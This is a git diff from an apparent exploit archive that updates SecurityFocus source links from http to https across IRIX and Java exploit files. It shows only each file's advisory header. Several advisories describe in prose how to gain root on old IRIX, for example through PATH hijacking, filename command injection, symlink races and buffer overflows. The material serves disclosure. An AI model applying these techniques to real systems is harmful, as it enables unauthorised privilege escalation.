http://www.securityfocus.com/bid/7672/info +source: https://www.securityfocus.com/bid/7672/info A buffer overflow vulnerability has been reported for the MediaMail binary that may result in a user obtaining elevated privileges. diff --git a/exploits/irix/dos/23167.c b/exploits/irix/dos/23167.c index 77ff6bf92..6ccf1263d 100644 --- a/exploits/irix/dos/23167.c +++ b/exploits/irix/dos/23167.c @@ -1,3 +1,4 @@ +/* against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) (c) 1999 by diff --git a/exploits/irix/local/19066.txt b/exploits/irix/local/19066.txt index f48014f47..3b4f1ac2b 100644 --- a/exploits/irix/local/19066.txt +++ b/exploits/irix/local/19066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/72/info +source: https://www.securityfocus.com/bid/72/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access. diff --git a/exploits/irix/local/19067.txt b/exploits/irix/local/19067.txt index 1f61874f2..e201aa9bb 100644 --- a/exploits/irix/local/19067.txt +++ b/exploits/irix/local/19067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/73/info +source: https://www.securityfocus.com/bid/73/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access. diff --git a/exploits/irix/local/19163.sh b/exploits/irix/local/19163.sh index 3bd6a7532..d6e847e1c 100755 --- a/exploits/irix/local/19163.sh +++ b/exploits/irix/local/19163.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/213/info +source: https://www.securityfocus.com/bid/213/info A vulnerability exists in the ioconfig program, as shipping with IRIX 6.4 S2MP from Silicon Graphics, Inc. This program is only available on Irix 6.4 for the Origin/Onyx2. Other machines running IRIX are not vulnerable. diff --git a/exploits/irix/local/19210.txt b/exploits/irix/local/19210.txt index 5f53dac9a..8e8788620 100644 --- a/exploits/irix/local/19210.txt +++ b/exploits/irix/local/19210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/262/info +source: https://www.securityfocus.com/bid/262/info The setuid root "midikeys" executable can be used to edit arbitrary files via its graphical user interface. This grants malicious users root access to the system. diff --git a/exploits/irix/local/19260.sh b/exploits/irix/local/19260.sh index 43221ed62..04d57abe7 100755 --- a/exploits/irix/local/19260.sh +++ b/exploits/irix/local/19260.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/330/info +source: https://www.securityfocus.com/bid/330/info SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access. diff --git a/exploits/irix/local/19262.txt b/exploits/irix/local/19262.txt index c38bb39e3..e8bc5bb2b 100644 --- a/exploits/irix/local/19262.txt +++ b/exploits/irix/local/19262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/333/info +source: https://www.securityfocus.com/bid/333/info A vulnerability exists in the /usr/bin/X11/cdplayer application as shipped with SGI's IRIX operating system. By failing to shed root privileges, and creating arbitrary directories as root, cdplayer allows arbitrary users to gain root on the system. diff --git a/exploits/irix/local/19267.c b/exploits/irix/local/19267.c index 7abf9e1ee..6a0d38d87 100644 --- a/exploits/irix/local/19267.c +++ b/exploits/irix/local/19267.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/334/info +// source: https://www.securityfocus.com/bid/334/info A vulnerability exists in the X libraries as supplied with Silicon Graphics IRIX operating system. By placing a carefully constructed buffer as the argument to the -xrm option, an attacker can execute arbitrary code. diff --git a/exploits/irix/local/19268.txt b/exploits/irix/local/19268.txt index 94cdaf9ee..28fa3df34 100644 --- a/exploits/irix/local/19268.txt +++ b/exploits/irix/local/19268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/335/info +source: https://www.securityfocus.com/bid/335/info A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file. diff --git a/exploits/irix/local/19269.txt b/exploits/irix/local/19269.txt index 6cb19f2d2..9173f9809 100644 --- a/exploits/irix/local/19269.txt +++ b/exploits/irix/local/19269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/336/info +source: https://www.securityfocus.com/bid/336/info Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. diff --git a/exploits/irix/local/19273.sh b/exploits/irix/local/19273.sh index 06c6cc98c..6afd9540a 100755 --- a/exploits/irix/local/19273.sh +++ b/exploits/irix/local/19273.sh @@ -1,5 +1,5 @@ #!/bin/sh -#source: http://www.securityfocus.com/bid/345/info +#source: https://www.securityfocus.com/bid/345/info # #A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. # diff --git a/exploits/irix/local/19274.c b/exploits/irix/local/19274.c index 999b9e5d0..44c8ebae6 100644 --- a/exploits/irix/local/19274.c +++ b/exploits/irix/local/19274.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/346/info +// source: https://www.securityfocus.com/bid/346/info A buffer overflow exists in IRIX 5.x and 6.x 'df' utility, from Silicon Graphics Inc. By supplying a long argument to the -f option of df, a user can crash the df program. By carefully crafting a buffer containing machine executable code, an attacker can run arbitrary commands as root. diff --git a/exploits/irix/local/19275.txt b/exploits/irix/local/19275.txt index 4904da5e2..2445d85ce 100644 --- a/exploits/irix/local/19275.txt +++ b/exploits/irix/local/19275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/347/info +source: https://www.securityfocus.com/bid/347/info A vulnerability exists in the datman/cdman program, as included with Irix 6.2 and 5.3 from Silicon Graphics Inc. The vulnerability would allow arbitrary users to execute commands as root. diff --git a/exploits/irix/local/19276.c b/exploits/irix/local/19276.c index a33b1600e..a9f7ad197 100644 --- a/exploits/irix/local/19276.c +++ b/exploits/irix/local/19276.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/351/info +// source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations. diff --git a/exploits/irix/local/19277.c b/exploits/irix/local/19277.c index dac1b241c..f14e9f797 100644 --- a/exploits/irix/local/19277.c +++ b/exploits/irix/local/19277.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/351/info +// source: https://www.securityfocus.com/bid/351/info A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations. diff --git a/exploits/irix/local/19280.txt b/exploits/irix/local/19280.txt index 115c43e8c..eb635b2ab 100644 --- a/exploits/irix/local/19280.txt +++ b/exploits/irix/local/19280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/355/info +source: https://www.securityfocus.com/bid/355/info A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. diff --git a/exploits/irix/local/19304.txt b/exploits/irix/local/19304.txt index de30add02..707dc3de7 100644 --- a/exploits/irix/local/19304.txt +++ b/exploits/irix/local/19304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/381/info +source: https://www.securityfocus.com/bid/381/info The inpview utility, included by SGI in its Irix operating system, contains a vulnerability that will allow any local user to obtain root access. inpview is part of the InPerson dektop video conferencing package. As it needs to access a video capture device, it is setuid root, and attempts to run the "ttsession" utility using the system() library call. It does not specificy an explicit path, and as such will execute the first program or script named "ttsession" in the users path. By setting /tmp to be first in your path, creating a shell script in /tmp call ttsession, and making it executable, this shell script will be executed as root. diff --git a/exploits/irix/local/19310.c b/exploits/irix/local/19310.c index a0e4419ef..0a381e2ce 100644 --- a/exploits/irix/local/19310.c +++ b/exploits/irix/local/19310.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/392/info +source: https://www.securityfocus.com/bid/392/info A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefully crafted, log buffer to the -h option of login, a local user can obtain root privileges. */ diff --git a/exploits/irix/local/19313.txt b/exploits/irix/local/19313.txt index 4e79d5836..9b93bd89a 100644 --- a/exploits/irix/local/19313.txt +++ b/exploits/irix/local/19313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/395/info +source: https://www.securityfocus.com/bid/395/info A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp. diff --git a/exploits/irix/local/19317.c b/exploits/irix/local/19317.c index 0f034d424..ccd0691bb 100644 --- a/exploits/irix/local/19317.c +++ b/exploits/irix/local/19317.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/415/info +// source: https://www.securityfocus.com/bid/415/info A buffer overflow exists in the ordist program, as shipped with Irix 6.x and 5.x from Silicon Graphics. By supplying long arguments to the '-d' option, containing a properly crafted buffer of machine exectuable code, root privilege can be obtained. diff --git a/exploits/irix/local/19319.txt b/exploits/irix/local/19319.txt index 00fcd0005..0a53ead9e 100644 --- a/exploits/irix/local/19319.txt +++ b/exploits/irix/local/19319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/419/info +source: https://www.securityfocus.com/bid/419/info A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. diff --git a/exploits/irix/local/19347.c b/exploits/irix/local/19347.c index c60e0d1e3..951dca994 100644 --- a/exploits/irix/local/19347.c +++ b/exploits/irix/local/19347.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/457/info +// source: https://www.securityfocus.com/bid/457/info The pset utility, as shipped by SGI with Irix 5.x and 6.x through 6.3, contains a buffer overflow, which can allow any user on the system to execute arbitrary code on the machine as root. Pset is used to configure and administer processor groups in multiprocessor systems. By supplying a well crafted, long buffer as an argument, the return address on the stack is overwritten, allowing an attacker to execute code other than that which was intended. diff --git a/exploits/irix/local/19349.txt b/exploits/irix/local/19349.txt index ded208909..1df949943 100644 --- a/exploits/irix/local/19349.txt +++ b/exploits/irix/local/19349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/460/info +source: https://www.securityfocus.com/bid/460/info A vulnerability exists in the rmail utility, included by SGI with it's Irix operating system. By failing to sanity check the contents of an environment variable, arbitrary commands may be executed with gid mail. rmail is used with uucp. diff --git a/exploits/irix/local/19351.sh b/exploits/irix/local/19351.sh index 5a3ab3e82..284b4ea3e 100755 --- a/exploits/irix/local/19351.sh +++ b/exploits/irix/local/19351.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/464/info +source: https://www.securityfocus.com/bid/464/info A race condition exists in the serial_ports administrative program, as included by SGI in the 5.x Irix operating system. This race condition allows regular users to execute arbitrary commands as root. diff --git a/exploits/irix/local/19353.txt b/exploits/irix/local/19353.txt index baaec1c38..f872505e2 100644 --- a/exploits/irix/local/19353.txt +++ b/exploits/irix/local/19353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/467/info +source: https://www.securityfocus.com/bid/467/info A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. diff --git a/exploits/irix/local/19355.txt b/exploits/irix/local/19355.txt index 67710b6ab..b5b039dce 100644 --- a/exploits/irix/local/19355.txt +++ b/exploits/irix/local/19355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/469/info +source: https://www.securityfocus.com/bid/469/info A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with Irix versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root, and creates a temporary file called /tmp/.midipid. It does not check to see if this file already exists, and is a symbolic link. As such, it can be used to create root owned files, with permissions as set by the user umask. diff --git a/exploits/irix/local/19356.txt b/exploits/irix/local/19356.txt index bc20b9346..2d6cf7e58 100644 --- a/exploits/irix/local/19356.txt +++ b/exploits/irix/local/19356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/470/info +source: https://www.securityfocus.com/bid/470/info A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. diff --git a/exploits/irix/local/19358.txt b/exploits/irix/local/19358.txt index 93d77997d..9c75cdcee 100644 --- a/exploits/irix/local/19358.txt +++ b/exploits/irix/local/19358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/472/info +source: https://www.securityfocus.com/bid/472/info The xfsdump program shipped with Irix 5.x and 6.x from SGI contains a vulnerability which could lead to root compromise. By creating a log file in /usr/tmp called bck.log, a user could create a symbolic link from this file to any file they wish to be created as root. This is turn could be used to compromise the system. diff --git a/exploits/irix/local/19706.sh b/exploits/irix/local/19706.sh index ed58f0c72..5a9a073ec 100755 --- a/exploits/irix/local/19706.sh +++ b/exploits/irix/local/19706.sh @@ -1,5 +1,5 @@ #!/bin/sh -#source: http://www.securityfocus.com/bid/909/info +#source: https://www.securityfocus.com/bid/909/info # #SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root privileges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. # diff --git a/exploits/irix/local/20126.c b/exploits/irix/local/20126.c index 87d7d0225..b3cfce811 100644 --- a/exploits/irix/local/20126.c +++ b/exploits/irix/local/20126.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1526/info +source: https://www.securityfocus.com/bid/1526/info Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges. diff --git a/exploits/irix/local/20127.c b/exploits/irix/local/20127.c index eba21da40..2ea3aaf3f 100644 --- a/exploits/irix/local/20127.c +++ b/exploits/irix/local/20127.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1527/info +source: https://www.securityfocus.com/bid/1527/info Certain versions of IRIX ship with a version libgl.so which is vulnerable to buffer overflow attacks. This library, libgl.so, is used in conjunction with graphical programs which use OpenGL. As a result a number of programs which utilize libgl.so can be exploited via this problem. The exploit which is in known public circulation at this time uses both gmemusage and gr_osview to exploit this problem. The buffer overflow itself is in how libgl.so handles the $HOME variable is handled (it is not checked for length). Further the programs which receive this $HOME variable from libgl.so further fail to limit it's size resulting in a buffer overflow attack. Should the receiving programs be SUID root (as are both gr_osview and gmemusage) the attacker will gain root access. */ diff --git a/exploits/irix/local/20128.c b/exploits/irix/local/20128.c index 0f3de9fe6..8938c13bd 100644 --- a/exploits/irix/local/20128.c +++ b/exploits/irix/local/20128.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1528/info +source: https://www.securityfocus.com/bid/1528/info Certain versions of IRIX ship with a version of dmplay which is vulnerable to a buffer overflow attack. The program, dmplay, is used to play movie files under IRIX. The problem at hand is the way the program handles the DISPLAY variable for the users X terminal. It does not check bounds and therefore is vulnerable to attack by an overly long user supplied string. */ diff --git a/exploits/irix/local/20129.c b/exploits/irix/local/20129.c index 2ac2ee86f..770b5ac79 100644 --- a/exploits/irix/local/20129.c +++ b/exploits/irix/local/20129.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1529/info +source: https://www.securityfocus.com/bid/1529/info Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. */ diff --git a/exploits/irix/local/20130.c b/exploits/irix/local/20130.c index 7f81b8778..a88466081 100644 --- a/exploits/irix/local/20130.c +++ b/exploits/irix/local/20130.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1530/info +source: https://www.securityfocus.com/bid/1530/info Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition. diff --git a/exploits/irix/local/20137.c b/exploits/irix/local/20137.c index cfe12d338..4bfc60d05 100644 --- a/exploits/irix/local/20137.c +++ b/exploits/irix/local/20137.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1540/info +source: https://www.securityfocus.com/bid/1540/info The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable other versions may exhibit this behaviour as well. */ diff --git a/exploits/irix/local/20138.c b/exploits/irix/local/20138.c index a7b54c97c..3cf8ccf81 100644 --- a/exploits/irix/local/20138.c +++ b/exploits/irix/local/20138.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1542/info +source: https://www.securityfocus.com/bid/1542/info The mail(1) program, also know as mail_att, is used to read or send email. A buffer overflow condition exists in code that handles the LOGNAME environment variable. This could be exploited to elevate privileges. */ diff --git a/exploits/irix/local/20263.txt b/exploits/irix/local/20263.txt index f3062ed21..25b1af801 100644 --- a/exploits/irix/local/20263.txt +++ b/exploits/irix/local/20263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1751/info +source: https://www.securityfocus.com/bid/1751/info The IRIX's /usr/lib/desktop/permissions tool is a suid and sgid root applications normally used by users to modify permissions of their files and files they are privileged for. A vulnerability in the permissions tool allows local malicious users to modify the permissions of any file on the system. diff --git a/exploits/irix/local/20804.c b/exploits/irix/local/20804.c index 008516fb4..ecbd88c8b 100644 --- a/exploits/irix/local/20804.c +++ b/exploits/irix/local/20804.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2656/info +// source: https://www.securityfocus.com/bid/2656/info The 'netprint' utility shipped with SGI Irix systems is used to send print jobs to print spoolers on remote hosts. It is installed setuid root by default. diff --git a/exploits/irix/local/20937.c b/exploits/irix/local/20937.c index 4d2772a6f..4127dc35f 100644 --- a/exploits/irix/local/20937.c +++ b/exploits/irix/local/20937.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2887/info +// source: https://www.securityfocus.com/bid/2887/info Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems. diff --git a/exploits/irix/local/21720.txt b/exploits/irix/local/21720.txt index a47e35cbb..ea6c7d82a 100644 --- a/exploits/irix/local/21720.txt +++ b/exploits/irix/local/21720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5487/info +source: https://www.securityfocus.com/bid/5487/info fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems. diff --git a/exploits/irix/local/25361.txt b/exploits/irix/local/25361.txt index 1f8fb782f..5a49c92a6 100644 --- a/exploits/irix/local/25361.txt +++ b/exploits/irix/local/25361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13057/info +source: https://www.securityfocus.com/bid/13057/info gr_osview is reported prone to an information disclosure vulnerability. This issue can help a local attacker to obtain sensitive information such as exposing an administrator's password hash and carrying out other attacks. diff --git a/exploits/irix/local/25362.txt b/exploits/irix/local/25362.txt index 74d8869e4..9d14c27c4 100644 --- a/exploits/irix/local/25362.txt +++ b/exploits/irix/local/25362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13058/info +source: https://www.securityfocus.com/bid/13058/info A local file overwrite vulnerability affects SGI IRIX. This issue is due to a failure of the affected utility to drop privileges prior to carrying out critical functionality. diff --git a/exploits/irix/remote/19316.c b/exploits/irix/remote/19316.c index 7c0ecff1f..959ccb313 100644 --- a/exploits/irix/remote/19316.c +++ b/exploits/irix/remote/19316.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/412/info +source: https://www.securityfocus.com/bid/412/info A vulnerability has been discovered in the nsd service, as included by SGI in Irix 6.5.x. The vulnerability allows remote users to access potentially sensitive pieces of information, including, but not limited to, NIS map information, shadow password files, and remote connections. */ diff --git a/exploits/irix/remote/19788.pl b/exploits/irix/remote/19788.pl index 1b6b26f11..a12e8f2b7 100755 --- a/exploits/irix/remote/19788.pl +++ b/exploits/irix/remote/19788.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1031/info +source: https://www.securityfocus.com/bid/1031/info The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users. diff --git a/exploits/irix/remote/19822.c b/exploits/irix/remote/19822.c index 3efaa191b..44e668690 100644 --- a/exploits/irix/remote/19822.c +++ b/exploits/irix/remote/19822.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1079/info +// source: https://www.securityfocus.com/bid/1079/info A vulnerability exists in SGI's Objectserver service. By exploiting a vulnerability in this service, remote attackers can add root privileged accounts to the system being compromised. While a patch was made available, and IRIX 6.2 systems were thought to be fixed, the patch merely prevented the creation of root accounts, and did nothing to prevent the creation of other accounts. This vulnerability has existed in the wild since 1997, and was well publicized. diff --git a/exploits/irix/remote/19949.c b/exploits/irix/remote/19949.c index d81a93f21..4daa1173f 100644 --- a/exploits/irix/remote/19949.c +++ b/exploits/irix/remote/19949.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1234/info +// source: https://www.securityfocus.com/bid/1234/info A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated in to Network Associates Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced which could allow a remote attacker to gain root access on the firewall, or execute arbitrary commands on the firewall. diff --git a/exploits/irix/remote/20149.c b/exploits/irix/remote/20149.c index 02beaf2b2..1a0d4cd9e 100644 --- a/exploits/irix/remote/20149.c +++ b/exploits/irix/remote/20149.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1572/info +// source: https://www.securityfocus.com/bid/1572/info A vulnerability exists in the telnet daemon shipped with Irix versions 6.2 through 6.5.8, and in patched versions of the telnet daemon in Irix 5.2 through 6.1, from Silicon Graphics (SGI). The telnetd will blindly use data passed by the user in such a way as to make it possible for a remote attacker to execute arbitrary commands with the privileges of the daemon. In the case of the telnet daemon, this is root privileges. diff --git a/exploits/irix/remote/20805.c b/exploits/irix/remote/20805.c index 743be17f1..c3c1e89f0 100644 --- a/exploits/irix/remote/20805.c +++ b/exploits/irix/remote/20805.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2658/info +// source: https://www.securityfocus.com/bid/2658/info routed is a daemon used to dynamically update network routing tables. Certain operating systems (including IRIX 3.x up to 6.4 inclusive, Caldera OpenLinux 1.0 and 1.1) contain a routed version which allows attackers to write limited data to arbitrary files, with root privileges. routed communicates using the Routing Information Protocol (RIP - RFC1058, RFC1723). An obsolete command specified by this protocol is "traceon," which turns on certain debugging features and logs information to a file specified in the RIP packet. diff --git a/exploits/irix/remote/21571.c b/exploits/irix/remote/21571.c index 2537de340..340500064 100644 --- a/exploits/irix/remote/21571.c +++ b/exploits/irix/remote/21571.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5075/info +// source: https://www.securityfocus.com/bid/5075/info Throghout the implementation of the supported remote procedure calls, the server uses the popen() libc function. When popen() is used, arguments passed to the RPC are included in the command string. These arguments are not sanitized. If shell metacharacters, such as ";" and "|" are embedded in the remotely supplied arguments, additional commands may be executed. These commands will run with root privileges. diff --git a/exploits/java/dos/27882.java b/exploits/java/dos/27882.java index f9e97c9ec..a575f1194 100644 --- a/exploits/java/dos/27882.java +++ b/exploits/java/dos/27882.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17981/info +source: https://www.securityfocus.com/bid/17981/info Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets. diff --git a/exploits/java/dos/32860.txt b/exploits/java/dos/32860.txt index 13e9f518b..809fe90d7 100644 --- a/exploits/java/dos/32860.txt +++ b/exploits/java/dos/32860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34150/info +source: https://www.securityfocus.com/bid/34150/info Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests. diff --git a/exploits/java/remote/28887.txt b/exploits/java/remote/28887.txt index 7e79f817a..bdc0e3d7a 100644 --- a/exploits/java/remote/28887.txt +++ b/exploits/java/remote/28887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20832/info +source: https://www.securityfocus.com/bid/20832/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/remote/30502.txt b/exploits/java/remote/30502.txt index 3cd1ba475..e58d50197 100644 --- a/exploits/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25340/info +source: https://www.securityfocus.com/bid/25340/info The Sun Java Runtime Environment is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/java/webapps/20925.txt b/exploits/java/webapps/20925.txt index 54aba7ce5..d6f7e4e37 100644 --- a/exploits/java/webapps/20925.txt +++ b/exploits/java/webapps/20925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2868/info +source: https://www.securityfocus.com/bid/2868/info Screaming Media is a provider for custom web content. SiteWare Editor Desktop is the web-based administration tool for managing Screaming Media content. diff --git a/exploits/java/webapps/21543.txt b/exploits/java/webapps/21543.txt index a6fc7dd31..8a53aa203 100644 --- a/exploits/java/webapps/21543.txt +++ b/exploits/java/webapps/21543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5008/info +source: https://www.securityfocus.com/bid/5008/info Ruslan Communications Builder is a tool designed to assist a user in creating a website. It allows for remote administration through a web interface, and is implemented in Java. diff --git a/exploits/java/webapps/21562.txt b/exploits/java/webapps/21562.txt index f791c1b70..0d58edf8a 100644 --- a/exploits/java/webapps/21562.txt +++ b/exploits/java/webapps/21562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5035/info +source: https://www.securityfocus.com/bid/5035/info Wolfram Research's webMathematica is a Java based product which allows the inclusion of Mathematica content in a web environment. It includes CGI programs which generate image content based on user supplied input. diff --git a/exploits/java/webapps/21879.txt b/exploits/java/webapps/21879.txt index c6329bd3c..88373a6eb 100644 --- a/exploits/java/webapps/21879.txt +++ b/exploits/java/webapps/21879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5828/info +source: https://www.securityfocus.com/bid/5828/info A vulnerability has been reported for the Sun ONE Starter Kit 2.0 and ASTAware SearchDisc. The Starter Kit includes a search engine facility provided for easy information retrieval. The search engine included with the Starter Kit is a modified version of ASTAWare SearchDisc. Reportedly, the search engine is vulnerable to directory traversal attacks. diff --git a/exploits/java/webapps/21946.txt b/exploits/java/webapps/21946.txt index afc5c1f61..5f50d2ac6 100644 --- a/exploits/java/webapps/21946.txt +++ b/exploits/java/webapps/21946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5997/info +source: https://www.securityfocus.com/bid/5997/info vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/java/webapps/22752.txt b/exploits/java/webapps/22752.txt index 10f90b16a..9b4370745 100644 --- a/exploits/java/webapps/22752.txt +++ b/exploits/java/webapps/22752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7855/info +source: https://www.securityfocus.com/bid/7855/info H-Sphere is prone to multiple cross-site scripting vulnerabilities via the HTML template feature in the Hosting Control Panel. HTML and script code will not be filtered from pages which are generated when a request for an invalid or unknown template is made. diff --git a/exploits/java/webapps/23268.txt b/exploits/java/webapps/23268.txt index f4d3c8e23..f89fce960 100644 --- a/exploits/java/webapps/23268.txt +++ b/exploits/java/webapps/23268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8862/info +source: https://www.securityfocus.com/bid/8862/info Vivisimo Clustering Engine reported prone to cross-site scripting vulnerability. The problem occurs due to insufficient sanitization of parameters passed to the search script. As a result, an attacker may be capable of constructing a link designed to execute arbitrary script code within the browser of a user who follows it. diff --git a/exploits/java/webapps/24190.txt b/exploits/java/webapps/24190.txt index 739c497ec..e901792c7 100644 --- a/exploits/java/webapps/24190.txt +++ b/exploits/java/webapps/24190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/java/webapps/25702.txt b/exploits/java/webapps/25702.txt index 52a18c523..9522b2182 100644 --- a/exploits/java/webapps/25702.txt +++ b/exploits/java/webapps/25702.txt @@ -1,4 +1,4 @@ 